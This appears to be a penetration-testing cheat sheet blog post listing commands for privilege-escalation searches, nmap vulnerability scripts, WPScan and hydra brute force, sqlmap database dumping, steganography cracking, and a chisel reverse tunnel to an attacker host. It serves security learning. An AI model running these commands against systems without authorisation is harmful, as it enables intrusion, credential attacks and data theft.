Pentesting Tools
This document provides an overview of some essential tools and commands used in penetration testing. Each tool is briefly explained along with typical commands for common scenarios. It is important to note that each tool has many more commands and ways to be used, depending on the situation and the approach you want to take.
PENTESTING TOOLS & COMMANDS
PRIVILEGE ESCALATION COMMANDS
find
- Purpose: Search for files with specific permissions or names.
- Commands:
find / -perm -4000 2>/dev/null
find / -type f -name "flag*.txt" 2>/dev/null
Escalating Privileges with Capabilities
- Purpose: Use Linux capabilities to escalate privileges (if permitted).
- Command:
getcap -r / 2>/dev/null
SCANNING FOR VULNERABILITIES
Nmap
- Purpose: Discover open ports, services, and vulnerabilities.
- Commands:
nmap -sV --script=http-shellshock --script-args uri=/cgi-bin/test.cgi <IP>
nmap --script=http-vuln* -p 80 <IP>
nmap -p- --open -sS --min-rate 5000 -n -Pn <IP> -oG allPorts -vvv
nmap -p<PORT> -sCV <IP>
nmap --script smb-vuln-ms17-010 -p445 <IP>
WEB APPLICATION TESTING TOOLS
WPScan
- Purpose: Analyze WordPress sites for vulnerabilities.
- Commands:
wpscan --url <URL> -e vp --api-token <API-TOKEN> # Finding vulnerabilities
wpscan --url <URL> --enumerate u # Finding users
wpscan --url <URL> --passwords <PASSWORD_LIST> --usernames <USERNAME_LIST> # Bruteforce
wpscan --url <URL> -U <USER> -P <DICTIONARY>
wpscan --url <URL>/wordpress -e vt,vp --plugins-detection aggressive --api-token <API-TOKEN>
Joomla Scan
- Purpose: Analyze Joomla websites for vulnerabilities.
- Command:
perl joomscan.pl -u <URL>
Droopescan
- Purpose: Scan Drupal websites for vulnerabilities.
- Tool Link: Droopescan GitHub
WhatWeb
- Purpose: Identify technologies used by a website.
- Command:
whatweb <URL>
NETWORK ANALYSIS TOOLS
SNMPWalk
- Purpose: Query network devices via SNMP.
- Command:
snmpwalk -v2c -c public <IP>
Dig
- Purpose: Perform DNS lookups and reverse DNS resolution.
- Command:
dig @<IP> -x <IP>
EXPLOIT DEVELOPMENT TOOLS
SearchSploit
- Purpose: Search for publicly available exploits.
- Command:
searchsploit <exploit_name>
SQLMap
- Purpose: Automate SQL injection testing.
- Commands:
sqlmap -r <request_file> --dbs
sqlmap -r <request_file> -D <DB_NAME> --tables
sqlmap -r <request_file> -D <DB_NAME> -T <TABLE_NAME> --dump
sqlmap -u <URL> --form --dbs --batch
FILE AND DATA EXTRACTION TOOLS
Stegseek
- Purpose: Perform brute-force attacks on steganographic files.
- Command:
stegseek -sf <file.jpg> <dictionary>
Steghide
- Purpose: Extract hidden data from images or files.
- Command:
steghide extract -sf <file.jpg>
GPG
- Purpose: Decrypt files encrypted with PGP.
- Commands:
gpg --import priv.key
gpg --output <OUTPUT_FILE> --decrypt <INPUT_FILE.gpg>
BRUTE FORCE TOOLS
Hydra
- Purpose: Perform brute-force attacks on login forms.
- Commands:
hydra -l <USER> -P <WORDLIST> <IP> http-post-form "/login.php:username=^USER^&password=^PASS^:incorrect" -t 64 -F
DIRECTORY AND SUBDOMAINS ENUMERATION TOOLS
FFUF
- Purpose: Discover subdomains or hidden directories.
- Command:
ffuf -u http://<URL>/ -w <WORDLIST> -H "Host: FUZZ.<URL>" -fw 522
Gobuster
- Purpose: Enumerate subdomains and directories.
- Commands:
gobuster vhost -u http://<URL> --append-domain -w <WORDLIST> -r
Dirsearch
- Purpose: Identify hidden directories.
- Command:
dirsearch -u <URL>
MISCELLANEOUS TOOLS
Chisel
- Purpose: Perform port forwarding.
- Commands:
chisel server -p 8000 --reverse
chisel client <ATTACKER_IP>:8000 R:<LOCAL_PORT>:127.0.0.1:<REMOTE_PORT>
Ltrace
- Purpose: Trace dynamic library calls made by a program.
Feroxbuster
- Purpose: Perform recursive directory scans.
- Command:
feroxbuster -u <URL> -w <WORDLIST> -d 0 -t 100
Hashcat and HashID
This post is licensed under CC BY 4.0 by the author.